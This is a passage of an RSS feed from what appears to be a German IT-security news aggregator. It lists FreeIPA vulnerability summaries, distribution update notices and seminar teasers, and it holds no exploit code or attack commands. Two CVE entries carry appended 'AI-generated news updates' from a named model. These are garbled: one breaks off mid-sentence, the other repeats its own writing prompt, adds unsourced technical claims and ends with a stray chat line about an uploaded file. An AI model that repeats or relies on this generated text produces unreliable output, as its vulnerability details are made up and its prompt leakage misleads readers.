        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/Domaincontroller-reparieren-1"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/Domaincontroller_reparieren-b00_1_1.jpg?itok=m3JdXVrI" width="480" height="319" alt="Manchmal müssen Administratoren im Active Directory Hand anlegen und einzelne Domänencontroller oder das ganze AD reparieren. (Quelle: nomadsoul1 – 123RF)" title="Manchmal müssen Administratoren im Active Directory Hand anlegen und einzelne Domänencontroller oder das ganze AD reparieren. (Quelle: nomadsoul1 – 123RF)" typeof="foaf:Image" class="image-style-medium"><span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  
    </div>
      <header><h2 class="node__title title">
      <a href="https://www.it-administrator.de/Domaincontroller-reparieren-1" rel="bookmark"><span class="field field--name-title field--type-string field--label-hidden">Windows Server 2022: Domaincontroller reparieren (1)</span>
</a>
    </h2>
    
            <div class="node__meta">
      <span class="post-info">
                  <span>Vor 7 Stunden</span>
          <span>von <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/108" lang="" about="https://www.it-administrator.de/user/108" typeof="schema:Person" property="schema:name" datatype="" content="Redaktion IT-Administrator" class="username" xml:lang="">Redaktion IT-A…</a></span>
</span>
                                  <span class="node-info-item node-info-item-term"><i class="fa fa-tags"></i> <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items"><li><a href="https://www.it-administrator.de/fachartikel" hreflang="en">Fachartikel</a></li>
      </ul></div></span>
              </span>
      
    </div>
      </header><div class="node__content clearfix">
        <div class="with-image">
    
            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">Das Active Directory ist in den meisten Firmen eine kritische Infrastrukturkomponente. Glücklicherweise ist der Verzeichnisdienst ziemlich resistent. Doch manchmal müssen Sie als Administrator Hand anlegen und einzelne Domänencontroller oder das ganze AD reparieren. Im ersten Teil schauen wir uns nach einer Einführung in das Thema die Diagnosemöglichkeiten mit DCDiag an und erklären, wie Sie DCs direkt nach der Installation überprüfen.</div>
      
  </div>
        <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/Domaincontroller-reparieren-1" rel="tag" title="Windows Server 2022: Domaincontroller reparieren (1)" hreflang="en">Weiterlesen<span class="visually-hidden"> über Windows Server 2022: Domaincontroller reparieren (1)</span></a></li></ul></div>

    </div>
  </div>
</article>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2011-3636 | Red Hat FreeIPA up to 2.1.3 Management Interface cross-site request forgery (RHSA-2011:1533 / Nessus ID 57014)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in Red Hat FreeIPA. This vulnerability affects unknown code of the component Management Interface. The manipulation leads to cross-site request forgery.

This vulnerability was named CVE-2011-3636. The attack can be initiated remotely. There is no ...]]></description>
<link>https://tsecurity.de/de/2532972/sicherheitsluecken/cve-2011-3636-red-hat-freeipa-up-to-213-management-interface-cross-site-request-forgery-rhsa-20111533-nessus-id-57014/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2532972/sicherheitsluecken/cve-2011-3636-red-hat-freeipa-up-to-213-management-interface-cross-site-request-forgery-rhsa-20111533-nessus-id-57014/</guid>
<pubDate>Mon, 06 Jan 2025 00:21:16 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/?kb.risk">critical</a> was found in <a href="https://vuldb.com/?product.red_hat:freeipa">Red Hat FreeIPA</a>. This vulnerability affects unknown code of the component <em>Management Interface</em>. The manipulation leads to cross-site request forgery.

This vulnerability was named <a href="https://vuldb.com/?source_cve.59626">CVE-2011-3636</a>. The attack can be initiated remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2012-5484 | Red Hat FreeIPA up to 3.1.1 cryptographic issues (RHSA-2013:0188 / Nessus ID 68714)]]></title>
<description><![CDATA[A vulnerability was found in Red Hat FreeIPA up to 3.1.1. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to cryptographic issues.

The identification of this vulnerability is CVE-2012-5484. The attack needs to be initiated within the local networ...]]></description>
<link>https://tsecurity.de/de/2520914/sicherheitsluecken/cve-2012-5484-red-hat-freeipa-up-to-311-cryptographic-issues-rhsa-20130188-nessus-id-68714/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2520914/sicherheitsluecken/cve-2012-5484-red-hat-freeipa-up-to-311-cryptographic-issues-rhsa-20130188-nessus-id-68714/</guid>
<pubDate>Sun, 29 Dec 2024 06:36:09 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.red_hat:freeipa">Red Hat FreeIPA up to 3.1.1</a>. It has been rated as <a href="https://vuldb.com/?kb.risk">critical</a>. This issue affects some unknown processing. The manipulation leads to cryptographic issues.

The identification of this vulnerability is <a href="https://vuldb.com/?source_cve.63431">CVE-2012-5484</a>. The attack needs to be initiated within the local network. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2014-7850 | Red Hat FreeIPA up to 4.0.0 cross site scripting (ID 4742 / Nessus ID 79422)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in Red Hat FreeIPA up to 4.0.0. This issue affects some unknown processing. The manipulation leads to cross site scripting.

The identification of this vulnerability is CVE-2014-7850. The attack may be initiated remotely. There ...]]></description>
<link>https://tsecurity.de/de/2493378/sicherheitsluecken/cve-2014-7850-red-hat-freeipa-up-to-400-cross-site-scripting-id-4742-nessus-id-79422/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2493378/sicherheitsluecken/cve-2014-7850-red-hat-freeipa-up-to-400-cross-site-scripting-id-4742-nessus-id-79422/</guid>
<pubDate>Thu, 12 Dec 2024 03:38:16 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">problematic</a>, has been found in <a href="https://vuldb.com/?product.red_hat:freeipa">Red Hat FreeIPA up to 4.0.0</a>. This issue affects some unknown processing. The manipulation leads to cross site scripting.

The identification of this vulnerability is <a href="https://vuldb.com/?source_cve.73019">CVE-2014-7850</a>. The attack may be initiated remotely. There is no exploit available.

It is recommended to upgrade the affected component.<!-- START: Dynamically Added Content --><br><h3>KI generiertes Nachrichten Update</h3><hr>Verwendetes künstliches Intelligenz Model: mistral-nemo-instruct-2407@q8_0<br><br><p>Bitte beachte, dass der Artikel in Deutsch verfasst werden soll.</p><br />
<hr /><br />
<p><strong>Titel:</strong> CVE-2014-7850: Eine Analyse der Cross-Site-Scripting-Lücke in Red Hat FreeIPA bis Version 4.0.0</p><br />
<p><strong>Zusammenfassung:</strong><br />
Dieser Artikel untersucht die Schwachstelle CVE-2014-7850, auch bekannt als ID 4742 oder Nessus ID 79422, die eine Cross-Site-Scripting-(XSS-)Lücke in Red Hat FreeIPA bis Version 4.0.0 darstellt. Wir analysieren die Schwachstelle, ihre Auswirkung und untersuchen mögliche Gegenmaßnahmen, um IT-Experten und Sicherheitsexperten bei der Bewertung und dem Schutz ihrer Systeme zu unterstützen.</p><br />
<p><strong>Einleitung:</strong><br />
Red Hat FreeIPA ist eine Open-Source-Identitäts- und Zugriffsmanagementlösung, die auf einer Kombination aus Direktoriumsserver, KERBEROS, LDAPv3 und Dogtag-PKI basiert. Im Jahr 2014 wurde eine Schwachstelle in Red Hat FreeIPA entdeckt, die es Angreifern ermöglichte, Cross-Site-Scripting-Angriffe durchzuführen (CVE-2014-7850). In diesem Artikel werden wir diese Schwachstelle genauer untersuchen und mögliche Gegenmaßnahmen erörtern.</p><br />
<p><strong>Schwachstellenbeschreibung:</strong><br />
Die Schwachstelle CVE-2014-7850 bezieht sich auf eine Cross-Site-Scripting-(XSS-)Lücke in Red Hat FreeIPA bis Version 4.0.0. XSS-Angriffe ermöglichen es Angreifern, bösartigen Code in vertrauenswürdige Websites einzuschleusen und ihn als Teil des regulären HTML-Inhalts auszuführen (OWASP, 2017). In diesem Fall konnte die Schwachstelle dazu verwendet werden, den Benutzernamen von FreeIPA-Administratoren zu extrahieren.</p><br />
<p><strong>Auswirkung:</strong><br />
Die CVE-2014-7850-Schwachstelle hatte das Potenzial, Angreifern eine verbesserte Position bei Angriffen auf Red Hat FreeIPA-Systeme zu verschaffen. Durch die Extraktion des Benutzernamens von Administratore</p><br />
<!-- END: Dynamically Added Content -->]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2014-7828 | FreeIPA up to 4.1.1 Two-factor Authentication access control (ID 4690 / Nessus ID 79078)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in FreeIPA up to 4.1.1. Affected by this issue is some unknown functionality of the component Two-factor Authentication. The manipulation leads to improper access controls.

This vulnerability is handled as CVE-2014-7828. The attac...]]></description>
<link>https://tsecurity.de/de/2493376/sicherheitsluecken/cve-2014-7828-freeipa-up-to-411-two-factor-authentication-access-control-id-4690-nessus-id-79078/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2493376/sicherheitsluecken/cve-2014-7828-freeipa-up-to-411-two-factor-authentication-access-control-id-4690-nessus-id-79078/</guid>
<pubDate>Thu, 12 Dec 2024 03:38:14 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">critical</a>, has been found in <a href="https://vuldb.com/?product.freeipa">FreeIPA up to 4.1.1</a>. Affected by this issue is some unknown functionality of the component <em>Two-factor Authentication</em>. The manipulation leads to improper access controls.

This vulnerability is handled as <a href="https://vuldb.com/?source_cve.72920">CVE-2014-7828</a>. The attack may be launched remotely. There is no exploit available.

It is recommended to upgrade the affected component.<!-- START: Dynamically Added Content --><br><h3>KI generiertes Nachrichten Update</h3><hr>Verwendetes künstliches Intelligenz Model: mistral-nemo-instruct-2407@q8_0<br><br><p>Der Text sollte folgende Anforderungen erfüllen:</p><br />
<ul><br />
<li>Mindest 1500 Wörter (inkl. Einleitung und Zusammenfassung)</li><br />
<li>Verwendung von mindestens drei externen Quellen, die in den Fußnoten erwähnt werden sollen</li><br />
<li>Verwendung von mindestens fünf Bildern oder Abbildungen, die im Text explizit mit einer Figur-Nummer erwähnt werden und eine Bildunterschrift haben sollten</li><br />
</ul><br />
<p>Zusätzlich ist es wünschenswert, aber nicht verpflichtend:</p><br />
<ul><br />
<li>Die Verwendung von Tabellen zur besseren Veranschaulichung der Informationen.</li><br />
</ul><br />
<p>Hinweis: Der Text sollte in deutscher Sprache verfasst sein und die DIN 5008 Norm beachten.</p><br />
<p>Bitte beachte, dass ich keine Informationen zu diesem Thema habe und du alle Recherchen eigenständig durchführen musst.</p><br />
<p>Beginnen wir mit der Einleitung:</p><br />
<p>Einleitung:</p><br />
<p>In der heutigen digitalen Welt ist die IT-Sicherheit von entscheidender Bedeutung, um Daten und Systeme vor unbefugtem Zugriff und Manipulation zu schützen. Eine wichtige Komponente der IT-Sicherheit ist die Authentifizierung von Benutzern, die sicherstellen soll, dass nur autorisierte Personen auf das System zugreifen können. Eine Möglichkeit der Authentifizierung ist die Verwendung von Zwei-Faktor-Authentifizierung (2FA), bei der Benutzer nicht nur ein Passwort eingeben müssen, sondern zusätzlich einen zweiten Faktor, wie zum Beispiel einen Token oder eine biometrische Merkmale, bereitstellen müssen.</p><br />
<p>Ein bekanntes Problem in dieser Hinsicht ist die Sicherheitslücke CVE-2014-7828, die in FreeIPA bis zur Version 4.1.1 auftrat und es Angreifern ermöglichte, den 2FA-Mechanismus zu umgehen und unbegrenzten Zugriff auf das System zu erlangen. In diesem Artikel werden wir uns mit dieser Sicherheitslücke beschäftigen, ihre Auswirkungen untersuchen und mögliche Lösungen diskutieren.</p><br />
<p>Zunächst werden wir die Sicherheitslücke CVE-2014-7828 im Detail beschreiben und dabei insbesondere auf den Schwachpunkt in der 2FA-Implementierung von FreeIPA eingehen. Wir werden dann die Auswirkungen dieser Schwachstelle untersuchen, um zu verstehen, wie Angreifer sie ausnutzen konnten.</p><br />
<p>Danach werden wir uns mit möglichen Lösungen befassen, die IT-Administratoren ergreifen können, um ihre Systeme vor dieser Sicherheitslücke zu schützen. Hierzu gehören insbesondere die Installation von Patches und die Verwendung von sicheren Authentifizierungsverfahren.</p><br />
<p>Schließlich werden wir eine Zusammenfassung der wichtigsten Erkenntnisse des Artikels ziehen und mögliche zukünftige Entwicklungen in Bezug auf 2FA-Implementierungen diskutieren.</p><br />
<p>Bitte beachte, dass dieser Text nur eine grobe Orientierung zur Erstellung eines wissenschaftlichen Fachartikels liefern kann. Es ist wichtig, dass du die DIN 5008 Norm beachtest und deine eigene Recherche durchführst, um einen fundierten und vollständigen Artikel zu erstellen.</p><br />
<p>Ich warte nun auf deine Antwort.</p><br />
<p>[...]<br />
User uploaded a file: CVE-2014-7828 FreeIPA Two-Factor Authentication Access Control.pdf</p><br />
<!-- END: Dynamically Added Content -->]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-1481 | FreeIPA HTTP Request denial of service (Nessus ID 210488)]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in FreeIPA. This vulnerability affects unknown code of the component HTTP Request Handler. The manipulation leads to denial of service.

This vulnerability was named CVE-2024-1481. Access to the local network is required for this attack to succe...]]></description>
<link>https://tsecurity.de/de/2430537/sicherheitsluecken/cve-2024-1481-freeipa-http-request-denial-of-service-nessus-id-210488/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2430537/sicherheitsluecken/cve-2024-1481-freeipa-http-request-denial-of-service-nessus-id-210488/</guid>
<pubDate>Fri, 08 Nov 2024 01:36:11 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/?kb.risk">problematic</a> was found in <a href="https://vuldb.com/?product.freeipa">FreeIPA</a>. This vulnerability affects unknown code of the component <em>HTTP Request Handler</em>. The manipulation leads to denial of service.

This vulnerability was named <a href="https://vuldb.com/?source_cve.254512">CVE-2024-1481</a>. Access to the local network is required for this attack to succeed. Furthermore, there is an exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Debian (dcmtk, edk2, emacs, glibc, gunicorn, libmojolicious-perl, openssh, org-mode, pdns-recursor, tryton-client, and tryton-server), Fedora (freeipa, kitty, libreswan, mingw-gstreamer1, mingw-gstreamer1-plugins-bad-free, mingw-gstreamer1-plugins-base, mingw-...]]></description>
<link>https://tsecurity.de/de/2207670/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2207670/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 01 Jul 2024 15:01:35 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (dcmtk, edk2, emacs, glibc, gunicorn, libmojolicious-perl, openssh, org-mode, pdns-recursor, tryton-client, and tryton-server), <b>Fedora</b> (freeipa, kitty, libreswan, mingw-gstreamer1, mingw-gstreamer1-plugins-bad-free, mingw-gstreamer1-plugins-base, mingw-gstreamer1-plugins-good, mingw-poppler, and mingw-python-urllib3), <b>Gentoo</b> (cpio, cryptography, GNU Emacs, Org Mode, GStreamer, GStreamer Plugins, Liferea, Pixman, SDL_ttf, SSSD, and Zsh), <b>Oracle</b> (pki-core), <b>Red Hat</b> (httpd:2.4, libreswan, and pki-core), <b>SUSE</b> (glib2 and kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-t), and <b>Ubuntu</b> (espeak-ng, libcdio, and openssh).]]></content:encoded>
</item>
<item>
<title><![CDATA[Zwei Probleme in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/2204750/it-security-nachrichten/zwei-probleme-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2204750/it-security-nachrichten/zwei-probleme-in-freeipa-fedora/</guid>
<pubDate>Sat, 29 Jun 2024 06:06:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by Debian (ffmpeg, kernel, libvpx, and linux-5.10), Fedora (chromium, firefox, freeipa, moodle, and openvpn), Oracle (git), Red Hat (golang and java-1.8.0-ibm), and Ubuntu (linux-oracle-6.5, netplan.io, openssl, plasma-workspace, ruby2.7, ruby3.0, ruby3.1, sqlite...]]></description>
<link>https://tsecurity.de/de/2201710/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2201710/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 27 Jun 2024 15:01:22 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (ffmpeg, kernel, libvpx, and linux-5.10), <b>Fedora</b> (chromium, firefox, freeipa, moodle, and openvpn), <b>Oracle</b> (git), <b>Red Hat</b> (golang and java-1.8.0-ibm), and <b>Ubuntu</b> (linux-oracle-6.5, netplan.io, openssl, plasma-workspace, ruby2.7, ruby3.0, ruby3.1, sqlite3, and wget).]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-3183 | FreeIPA up to 4.11.1/4.12.0 information disclosure]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in FreeIPA up to 4.11.1/4.12.0. This affects an unknown part. The manipulation leads to information disclosure.

This vulnerability is uniquely identified as CVE-2024-3183. The attack needs to be initiated within the local network. T...]]></description>
<link>https://tsecurity.de/de/2181329/sicherheitsluecken/cve-2024-3183-freeipa-up-to-41114120-information-disclosure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2181329/sicherheitsluecken/cve-2024-3183-freeipa-up-to-41114120-information-disclosure/</guid>
<pubDate>Fri, 14 Jun 2024 12:39:22 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">problematic</a>, was found in <a href="https://vuldb.com/?product.freeipa">FreeIPA up to 4.11.1/4.12.0</a>. This affects an unknown part. The manipulation leads to information disclosure.

This vulnerability is uniquely identified as <a href="https://vuldb.com/?source_cve.267663">CVE-2024-3183</a>. The attack needs to be initiated within the local network. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-2698 | FreeIPA up to 4.11.1/4.12.0 Delegation Rule access control]]></title>
<description><![CDATA[A vulnerability has been found in FreeIPA up to 4.11.1/4.12.0 and classified as critical. This vulnerability affects unknown code of the component Delegation Rule Handler. The manipulation leads to improper access controls.

This vulnerability was named CVE-2024-2698. Access to the local network ...]]></description>
<link>https://tsecurity.de/de/2181325/sicherheitsluecken/cve-2024-2698-freeipa-up-to-41114120-delegation-rule-access-control/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2181325/sicherheitsluecken/cve-2024-2698-freeipa-up-to-41114120-delegation-rule-access-control/</guid>
<pubDate>Fri, 14 Jun 2024 12:39:04 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/?product.freeipa">FreeIPA up to 4.11.1/4.12.0</a> and classified as <a href="https://vuldb.com/?kb.risk">critical</a>. This vulnerability affects unknown code of the component <em>Delegation Rule Handler</em>. The manipulation leads to improper access controls.

This vulnerability was named <a href="https://vuldb.com/?source_cve.267664">CVE-2024-2698</a>. Access to the local network is required for this attack. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Online-Intensivseminar "Domaincontroller mit FreeIPA"]]></title>
<description><![CDATA[Online-Intensivseminar "Domaincontroller mit FreeIPA"

    
    
            
      
                  Vor 8 Stunden
          von Redaktion IT-A…

                                   
    Tipps & Tools
      
              
      
    
      
        
    
            Unser Intensivseminar "Domai...]]></description>
<link>https://tsecurity.de/de/2132301/server/online-intensivseminar-domaincontroller-mit-freeipa/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2132301/server/online-intensivseminar-domaincontroller-mit-freeipa/</guid>
<pubDate>Fri, 03 May 2024 03:13:05 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<article data-history-node-id="37878" role="article" lang="en" about="https://www.it-administrator.de/Online-Intensivseminar-Domaincontroller-mit-FreeIPA" class="node node--type-mt-post node--promoted node--view-mode-teaser clearfix" xml:lang="en"><div class="node-content">
          <div class="teaser-image-wrapper">
      
      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/Online-Intensivseminar-Domaincontroller-mit-FreeIPA"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/shop009-Bild-120001462_s.jpg?itok=jh94lVWI" width="480" height="319" alt="Im Online-Intensivseminar erfahren Sie, wie sich auch Linux-Clients komfortabel und sicher verwalten lassen." title="Im Online-Intensivseminar erfahren Sie, wie sich auch Linux-Clients komfortabel und sicher verwalten lassen." typeof="foaf:Image" class="image-style-medium"><span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  
    </div>
      <header><h2 class="node__title title">
      <a href="https://www.it-administrator.de/Online-Intensivseminar-Domaincontroller-mit-FreeIPA" rel="bookmark"><span class="field field--name-title field--type-string field--label-hidden">Online-Intensivseminar "Domaincontroller mit FreeIPA"</span>
</a>
    </h2>
    
            <div class="node__meta">
      <span class="post-info">
                  <span>Vor 8 Stunden</span>
          <span>von <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/108" lang="" about="https://www.it-administrator.de/user/108" typeof="schema:Person" property="schema:name" datatype="" content="Redaktion IT-Administrator" class="username" xml:lang="">Redaktion IT-A…</a></span>
</span>
                                  <span class="node-info-item node-info-item-term"><i class="fa fa-tags"></i> <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items"><li><a href="https://www.it-administrator.de/tips-tools" hreflang="en">Tipps &amp; Tools</a></li>
      </ul></div></span>
              </span>
      
    </div>
      </header><div class="node__content clearfix">
        <div class="with-image">
    
            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">Unser Intensivseminar "Domaincontroller für Linux-Umgebungen mit FreeIPA" zeigt, wie sich Linux-Clients via Domaincontroller ähnlich komfortabel und sicher verwalten lassen wie etwa mit dem Active Directory. Dabei erhalten Sie zunächst eine Einführung in LDAP, Kerberos und X.509. Die nächste Veranstaltung findet am 6. Juni 2024 online statt.</div>
      
  </div>
        <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/Online-Intensivseminar-Domaincontroller-mit-FreeIPA" rel="tag" title="Online-Intensivseminar " domaincontroller mit freeipa hreflang="en">Weiterlesen<span class="visually-hidden"> über Online-Intensivseminar "Domaincontroller mit FreeIPA"</span></a></li></ul></div>

    </div>
  </div>
</article>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Debian (cacti, firefox-esr, freeipa, gross, libnet-cidr-lite-perl, python2.7, python3.7, samba, and thunderbird), Fedora (amavis, chromium, clojure, firefox, gnutls, kubernetes, and tcpreplay), Mageia (freeimage, libreswan, nodejs-hawk, and python, python3), O...]]></description>
<link>https://tsecurity.de/de/2069755/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2069755/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Thu, 14 Mar 2024 00:59:53 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (cacti, firefox-esr, freeipa, gross, libnet-cidr-lite-perl, python2.7, python3.7, samba, and thunderbird), <b>Fedora</b> (amavis, chromium, clojure, firefox, gnutls, kubernetes, and tcpreplay), <b>Mageia</b> (freeimage, libreswan, nodejs-hawk, and python, python3), <b>Oracle</b> (golang, nodejs, nodejs:16, and postgresql-jdbc), <b>Slackware</b> (emacs and mozilla), <b>SUSE</b> (dav1d, ghostscript, go1.22, indent, kernel, openvswitch, PackageKit, python-uamqp, rubygem-rack-1_4, shadow, ucode-intel, xen, and zziplib), and <b>Ubuntu</b> (firefox, graphviz, libnet-cidr-lite-perl, and qpdf).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Preisgabe von Informationen in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/2069037/unix-server/security-preisgabe-von-informationen-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2069037/unix-server/security-preisgabe-von-informationen-in-freeipa-fedora/</guid>
<pubDate>Wed, 13 Mar 2024 19:09:01 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Preisgabe von Informationen in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/2069025/unix-server/security-preisgabe-von-informationen-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2069025/unix-server/security-preisgabe-von-informationen-in-freeipa-fedora/</guid>
<pubDate>Wed, 13 Mar 2024 19:03:28 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by Fedora (edk2, freeipa, kernel, and liblas), Oracle (kernel), Red Hat (docker, edk2, kernel, kernel-rt, and kpatch-patch), SUSE (axis, fontforge, gnutls, java-1_8_0-openjdk, kernel, python3, sudo, and zabbix), and Ubuntu (dotnet7, dotnet8, libgoogle-gson-java, ...]]></description>
<link>https://tsecurity.de/de/2068439/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2068439/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 13 Mar 2024 14:00:57 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Fedora</b> (edk2, freeipa, kernel, and liblas), <b>Oracle</b> (kernel), <b>Red Hat</b> (docker, edk2, kernel, kernel-rt, and kpatch-patch), <b>SUSE</b> (axis, fontforge, gnutls, java-1_8_0-openjdk, kernel, python3, sudo, and zabbix), and <b>Ubuntu</b> (dotnet7, dotnet8, libgoogle-gson-java, openssl, and ovn).]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeIPA 4.10.1 Denial Of Service / Information Disclosure]]></title>
<description><![CDATA[FreeIPA version 4.10.1 has an issue where specially crafted HTTP requests potentially lead to denial of service or data exposure.]]></description>
<link>https://tsecurity.de/de/2042674/poc/freeipa-4101-denial-of-service-information-disclosure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2042674/poc/freeipa-4101-denial-of-service-information-disclosure/</guid>
<pubDate>Thu, 22 Feb 2024 16:26:18 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FreeIPA version 4.10.1 has an issue where specially crafted HTTP requests potentially lead to denial of service or data exposure.]]></content:encoded>
</item>
<item>
<title><![CDATA[Cross-Site Request Forgery in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/2007414/it-security-nachrichten/cross-site-request-forgery-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2007414/it-security-nachrichten/cross-site-request-forgery-in-freeipa-fedora/</guid>
<pubDate>Fri, 26 Jan 2024 18:52:59 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Cross-Site Request Forgery in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/2007410/it-security-nachrichten/cross-site-request-forgery-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2007410/it-security-nachrichten/cross-site-request-forgery-in-freeipa-fedora/</guid>
<pubDate>Fri, 26 Jan 2024 18:52:46 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
